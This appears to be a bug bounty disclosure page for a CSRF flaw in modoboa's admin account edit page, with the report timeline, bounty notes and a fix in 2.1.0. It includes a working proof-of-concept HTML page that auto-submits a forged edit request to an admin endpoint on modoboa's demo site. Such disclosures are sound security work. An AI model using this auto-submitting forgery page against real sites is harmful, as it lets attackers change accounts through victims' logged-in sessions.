CSRF leading to edit admin accounts in modoboa/modoboa

Valid

Reported on

Feb 26th 2023


Description

GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.

Proof of Concept

Login as admin. try to edit admin accounts (example id=4) Open the following file in the browser.

<!DOCTYPE html> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://demo.modoboa.org/admin/accounts/4/edit/"> <input type="hidden" name="active_tab" value="default" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

Impact

Attacker would be forced to edit& update admin accounts

We are processing your report and will contact the modoboa team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Antoine Nguyen validated this vulnerability a year ago
memmedrehimzade has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
memmedrehimzade
a year ago

Researcher


Can you assign a CVE please?

memmedrehimzade
a year ago

Researcher


any update?

memmedrehimzade
a year ago

Researcher


@admin

Ben Harvie
10 months ago

Admin


The maintainer has the power to assign a CVE during the fix and publish stages.

Antoine Nguyen marked this as fixed in 2.1.0 with commit 5d886f 10 months ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has now been published 10 months ago
to join this conversation